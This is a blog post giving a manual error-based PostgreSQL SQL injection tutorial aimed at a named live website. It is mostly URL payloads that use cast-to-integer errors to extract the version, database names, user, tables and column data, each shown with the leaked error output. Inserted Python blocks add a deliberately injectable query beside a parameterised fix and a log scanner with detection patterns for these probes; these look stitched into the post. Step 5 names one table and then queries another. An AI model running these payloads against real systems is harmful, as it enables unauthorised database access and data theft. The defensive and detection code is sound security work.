Thursday, May 26, 2016

Manual SQL injection tutorial: Postgre error-based !!!

Postgre:

Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings, money, and dates.
Lets start to play with Postgre:

We have a SQL error based vulnerable website.

1st Step: find the vulnerability:
http://www.crtop.com.cn/index.cfm?MenuID=80'
ERROR: syntax error at or near "''"
It means this website can be injected. Remember that errors can vary, you won't get the same error every time.

2nd Step: columns count:
http://www.crtop.com.cn/index.cfm?MenuID=80 order by 1--
We get a valid page.
http://www.crtop.com.cn/index.cfm?MenuID=80 order by 2--
Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That error shows that there is one column. Lets try a UNION SELECT query:
http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--
Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched

Seems like UNION SELECT query is not working !!!
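To show where the behaviour in steps 1 and 2 comes from, and what the fix looks like on the application side, here is an added example (it is not code from the original post, and nothing is known about the real backend of the site above). It uses an in-memory sqlite3 table as a stand-in for the PostgreSQL database behind index.cfm, which is an assumption, and the table and column names are made up. The unsafe function pastes the MenuID parameter into the SQL text, so `order by 2--` reaches the database and the database error comes back; the safe function allow-lists the value and binds it as a parameter, so the same input never becomes SQL.

```python
import re
import sqlite3

# Constructed stand-in for the page's backend: an in-memory sqlite3 table plays the
# role of the PostgreSQL database behind index.cfm (an assumption; the real schema
# is not on the page, and the table/column names here are made up).
SCHEMA = """
CREATE TABLE menu (menuid INTEGER PRIMARY KEY, title TEXT);
INSERT INTO menu VALUES (80, 'Products');
INSERT INTO menu VALUES (81, 'Contact');
"""


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_query_unsafe(menu_id):
    """The injectable pattern: the raw MenuID request parameter is pasted into the
    SQL text, so whatever the client appends (order by 2--, and 1=cast(...)--, ...)
    becomes part of the statement the database parses."""
    return "SELECT title FROM menu WHERE menuid = " + menu_id


def lookup_unsafe(menu_id):
    """Run the concatenated query. Returns (rows, error_text); error_text is the raw
    database error, which is exactly the channel the error-based technique reads."""
    conn = _connect()
    try:
        return conn.execute(build_query_unsafe(menu_id)).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)
    finally:
        conn.close()


def is_valid_menu_id(menu_id):
    """Allow-list check: MenuID is a short run of digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,9}", menu_id) is not None


def lookup_safe(menu_id):
    """Hardened form: validate the parameter as an integer, then bind it with a
    placeholder so the value can never change the structure of the statement.
    Bound parameters alone already stop the injection; the allow-list additionally
    lets the application reject bad input before any database round-trip."""
    if not is_valid_menu_id(menu_id):
        raise ValueError("MenuID must be a positive integer")
    conn = _connect()
    try:
        return conn.execute(
            "SELECT title FROM menu WHERE menuid = ?", (int(menu_id),)
        ).fetchall()
    finally:
        conn.close()


if __name__ == "__main__":
    for probe in ("80", "80 order by 1--", "80 order by 2--"):
        print(repr(probe), "->", lookup_unsafe(probe))
    print("safe:", lookup_safe("80"))
```

Running it shows the same pattern as the post: `order by 1--` is silently accepted by the concatenated query, `order by 2--` produces a database error (sqlite's wording differs from PostgreSQL's, but it is the same ORDER BY position check), while the parameterised lookup rejects both before they reach the database.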


Lets try error-based Postgre SQLi…

3rd Step:
http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--

ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.rl (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see, we got the version of the Postgre DB server in the form of an error. Lets move on and find the database name.
http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "scoutsqld"
scoutsqld is the 1st database name; you can vary the offset to get the other database names:
http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is the 2nd database, so you can increase the offset till you get an error. Lets find out the user:
http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "postgres"
postgres is the user :) Lets find the tables :>
4th step:
http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "pg_type"
pg_type is the first table; we can get the others by changing the offset :)

5th step:

Now we have to find the columns from our specific table !!!

e.g. our table is action

For that we have to use char conversion: pg_type = CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

So our query is:
http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "typname"
And further you can find the other columns using the offset.

Last step:
Now we have to extract data from our column.
http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "bool"
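For the defender's side of the procedure walked through above, here is an added example (not from the original post): a small Python scanner that flags the request patterns and database error texts from steps 1 through 5 in a web access log and a PostgreSQL server log, and counts flagged requests per client so a run of probes stands out from a single odd request. The log lines are constructed for the example; the client IPs and timestamps are made up, and the assumed formats (Apache combined format for the access log, a timestamp log_line_prefix for PostgreSQL) are assumptions. It also handles the obvious false positive: a cast error whose quoted value is a near-number like "12a" is a mistyped form field, not data being read out.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample logs (not real captures): an Apache combined-format access log and a
# PostgreSQL server log with a timestamp log_line_prefix. Client IPs and timestamps are
# made up; the request shapes and error texts follow the post above.
ACCESS_LOG = """\
203.0.113.7 - - [26/May/2016:10:01:02 +0000] "GET /index.cfm?MenuID=80 HTTP/1.1" 200 5120
203.0.113.7 - - [26/May/2016:10:01:09 +0000] "GET /index.cfm?MenuID=80' HTTP/1.1" 500 412
203.0.113.7 - - [26/May/2016:10:01:15 +0000] "GET /index.cfm?MenuID=80%20order%20by%202-- HTTP/1.1" 500 430
203.0.113.7 - - [26/May/2016:10:01:31 +0000] "GET /index.cfm?MenuID=80%20and%201=cast(version()%20as%20int)-- HTTP/1.1" 500 611
203.0.113.7 - - [26/May/2016:10:02:04 +0000] "GET /index.cfm?MenuID=80%20and%201=cast((select%20datname%20from%20pg_database%20limit%201%20offset%201)%20as%20int)-- HTTP/1.1" 500 455
198.51.100.12 - - [26/May/2016:10:02:10 +0000] "GET /index.cfm?MenuID=81 HTTP/1.1" 200 4980
"""

PG_LOG = """\
2016-05-26 10:01:09 UTC ERROR:  syntax error at or near "''"
2016-05-26 10:01:15 UTC ERROR:  ORDER BY position 2 is not in select list
2016-05-26 10:01:31 UTC ERROR:  invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu"
2016-05-26 10:02:04 UTC ERROR:  invalid input syntax for integer: "template0"
2016-05-26 10:02:30 UTC ERROR:  invalid input syntax for integer: "12a"
"""

# Request-side signatures of the probing sequence, matched on the URL-decoded path.
REQUEST_SIGNATURES = {
    "quote_probe": re.compile(r"MenuID=\d+'", re.I),
    "order_by_enum": re.compile(r"\border\s+by\s+\d+", re.I),
    "cast_to_int": re.compile(r"\bcast\s*\(.*\bas\s+int\b", re.I | re.S),
    "catalog_read": re.compile(r"\b(pg_database|pg_type|information_schema\.\w+)\b", re.I),
    "chr_concat": re.compile(r"\bchr\s*\(\s*\d+\s*\)\s*\|\|", re.I),
}

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Database-side signatures: the error texts the technique relies on being echoed back.
PG_RE = re.compile(r"ERROR:\s+(?P<msg>.*)$")
PG_SIGNATURES = {
    "syntax_error_quote": re.compile(r"^syntax error at or near"),
    "order_by_position": re.compile(r"^ORDER BY position \d+ is not in select list"),
    "union_type_mismatch": re.compile(r"^UNION types .* cannot be matched"),
    "cast_leak": re.compile(r'^invalid input syntax for integer: "(?P<val>[^"]*)"'),
}


def scan_access_log(text):
    """One finding per suspicious request: (client_ip, http_status, [signature names])."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        path = unquote_plus(m.group("path"))
        hits = [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(path)]
        if hits:
            findings.append((m.group("ip"), int(m.group("status")), hits))
    return findings


def scan_pg_log(text):
    """One finding per matching ERROR line: (signature, leaked_value_or_None).
    A cast error whose quoted value starts with digits (e.g. "12a") is most likely a
    mistyped form field, not data being read out, so it is tagged probable_typo."""
    findings = []
    for line in text.splitlines():
        m = PG_RE.search(line)
        if not m:
            continue
        msg = m.group("msg")
        for name, rx in PG_SIGNATURES.items():
            hit = rx.search(msg)
            if not hit:
                continue
            if name == "cast_leak":
                val = hit.group("val")
                tag = "probable_typo" if re.fullmatch(r"\d+\S{0,3}", val) else name
                findings.append((tag, val))
            else:
                findings.append((name, None))
            break
    return findings


def suspicious_clients(access_text, min_hits=2):
    """Flagged requests per client; one odd request is noise, a run of them is a scan."""
    counts = Counter(ip for ip, _, _ in scan_access_log(access_text))
    return {ip: n for ip, n in counts.items() if n >= min_hits}


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print("request:", f)
    for f in scan_pg_log(PG_LOG):
        print("db error:", f)
    print("clients to triage:", suspicious_clients(ACCESS_LOG))
```

The two scans are meant to be correlated: the request signatures tell you which client is probing and the database signatures tell you what the error channel actually returned, which is what the application should never have echoed into the page in the first place (a generic error page plus parameterised queries closes both the disclosure and the injection).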
